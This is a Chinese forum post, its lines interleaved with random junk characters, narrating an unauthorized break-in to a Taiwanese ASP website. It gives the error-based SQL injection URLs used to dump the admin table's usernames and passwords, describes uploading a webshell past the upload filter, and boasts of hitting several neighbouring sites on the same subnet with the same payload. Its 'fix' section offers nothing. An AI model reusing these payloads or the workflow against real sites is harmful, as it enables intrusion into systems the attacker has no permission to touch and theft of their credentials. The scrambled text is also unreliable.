发现一个注入点
! d; |% I* D7 ~4 ihttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389, Q. h* E3 y& m0 ?7 e; Y6 r7 b0 C
+ C/ Q4 J! C8 g3 A8 g
习惯性的加’having1=1--
, }+ B/ N' C% Q# c2 A1 @
8 L6 q- [) [. @http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
/ W) ~- J) e: e
3 b* a( E H" L0 u* E$ ? s0" j/ J" A, K; P
! [! U3 U# l0 Q2 |. @爆出Diary_A.dl_Title(这时候很激动啊); {0 D& e$ k9 j# q. q- i; G
; D8 q v V8 E" x8 x8 f那么继续
4 u* H* _& o- I5 D B: }http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—+ V S% D5 H- H1 u$ n% h
3 ~& K4 e& U8 b: B! K7 U继续,一直爆下去
: w; s+ G' _: |. O- k3 o# U% b
爆到几个字段和表段 但是没找到需要的管理用户的字段 T% r6 v$ \( U/ z( k1 v
5 U/ j3 r9 I! y: n" b6 j
蛋疼了 怎么办 然后去后台登陆页看源码" t% G, @5 h& l6 t+ x; d
+ G8 V/ _3 x' r: D8 B; U! |) a. u0* A8 [. t* b( \8 A) ^8 P
. S+ i4 a3 s8 Q9 {/ I8 a# fInput name= “ADUID”
: h- b- O7 e3 ~6 F3 i2 E3 nInput name= “ADPWD”
6 |2 l: Y. H' Z: E- r. _' U6 ?, L' U& `4 z8 O2 B# J5 a4 }
很幸运 找到了字段那就继续
U4 i+ u4 s |找到之后开始爆用户
/ F; b& o% W! K T4 C1 `5 nhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
) |. y/ X3 n9 q+ h- t8 ?爆密码" j/ K8 r4 i, |7 c$ k
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
' F6 K5 V/ F! N _* Y- U$ m1 N. Q" i测试了下 这个注入点只能爆到文章哪里的表 & a* H% w, y8 ]7 p
8 z9 F/ ~* `5 h1 K! o$ ^% _8 y头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了' w( \7 V, L. p. e
, U- t3 V" J: r* X! X: s1 g
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
. u0 F: _% l& a0 E6 ~
; J0 u( c3 ], r2 d6 [9 r* C/ |0 y+ ?473 m2 n1 u, l1 Z0 D
7 A l* ]& ]7 d( b; x5 D9 F! `
进后台, c0 S% q* [/ ~
" e3 |8 n* u' {) }( B
9 _" {; O+ F' B+ V* }" N% n+ d, K发现几个上传点 有的地方不能上传 而且防止恶意代码, V0 S: ^ L. N# n. x+ `
+ W' v& ~7 O! _( G! h+ i没办法 各种百度各种找大牛 找到一只好像可以突破的马; B" b5 X# T( Z# a# k0 p$ U; V( F
9 s, a7 I0 n: ~9 a0 I7 Z: ~
' Q0 i8 n7 O+ v9 F6 |" L在系统管理那里直接上传 不过没有显示地址: l3 i( }$ D6 L( e4 P, M
5 w- }& ^6 V# Q- O/ B6 A- {, n
再上传一次 抓包 搞定OK
: L3 H; h! e* r: K! h+ o7 A T6 N1 _9 B. |; ]
' u w$ ]! ?% k( D4 f+ L
: U/ l6 E8 _0 C9 I8 r472' W6 v2 c% L3 r8 d
2 a7 ]8 ^* X; d2 @; Q晚上不行了 去睡觉。。。4 c3 F8 u% ~, R5 Z
第二天刚起床 闲的没事做继续日站吧 % v" B) }! ]4 _ a) T% H
5 @3 t7 Z0 z: |. x3 Y( y
找个站 就把这个站的旁c扫了下
4 K/ D/ \9 Q$ b1 f4 w" N o7 t
" ]$ \6 t/ v4 G {( Z- {发现c段也有一个购物站 ,然后还和这个站的模板差不多) X( |6 r5 l: J) ]
/ u+ d8 f; L( H2 T. ]3 l [! {就找到会员登录口测试" u) p$ z! H/ c5 `+ l6 Z) T
1 z! M- t1 O# o6 g' h3 ]
'and (select top 1 MGR_UID from A_MGR)>0—# c) J- v$ Y3 s# a+ [3 H( A
果断爆到了 这时候我很激动 通杀
9 F/ R- j4 N' s) w1 q' J' ?" M; X; [) C& c/ J
再次翻c段2 \4 t) I4 r1 ?' d/ G4 C0 v
0 V) G0 ^% F9 R2 s翻出几个站 都成功拿下
9 z8 D5 @& k: z1 [# T& }. m; i0 h4 l. I' h$ b& O c0 F" s0 e* \
4 a$ [" N9 z1 ~4 f+ m
# b; l% N2 E: B. V! X" o' O
修复方案:
5 [8 G% T6 q/ l他们比我专业
- s4 r8 y6 y0 ]( {/ |8 o0 a: L9 e9 w9 h6 n6 {
" ?3 X$ {6 I$ C
8 ~* N% P5 b9 b( Q5 b& S7 D |